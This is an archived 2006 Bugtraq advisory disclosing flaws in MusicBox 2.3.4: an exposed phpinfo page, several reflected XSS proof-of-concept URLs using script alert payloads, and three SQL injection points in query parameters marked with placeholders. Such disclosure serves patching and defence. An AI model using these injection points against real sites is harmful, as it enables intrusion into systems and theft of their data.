Home page logo
/

bugtraq logo Bugtraq mailing list archives

MusicBox <= 2.3.4 XSS SQL injection Vulnerability
From: securityconnection () gmail com
Date: 24 Jul 2006 16:00:16 -0000

MusicBox 2.3.4
http://www.musicboxv2.com
------------
PHPinfo page
------------
/phpinfo.php
--------------------------
Cross Site Scripting (XSS)
--------------------------
http://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0
http://www.target.xx/index.php?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0
http://www.target.xx/index.php?term=<script>alert(/EllipsisSecurityTest/)</script>&in=song&action=search&start=0
http://www.target.xx/index.php?action=top&show=5&type=<script>alert(/EllipsisSecurityTest/)</script>
http://www.target.xx/index.php?action=top&show=<script>alert(/EllipsisSecurityTest/)</script>&type=Artists
-------------
SQL injection
-------------
http://www.target.xx/index.php?term=hit&in=song&action=search&start=`[SQL]
http://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists
http://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL]
-----------------
Ellipsis Security
http://www.ellsec.org


  By Date           By Thread  

Current thread:
  • MusicBox <= 2.3.4 XSS SQL injection Vulnerability securityconnection (Jul 24)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]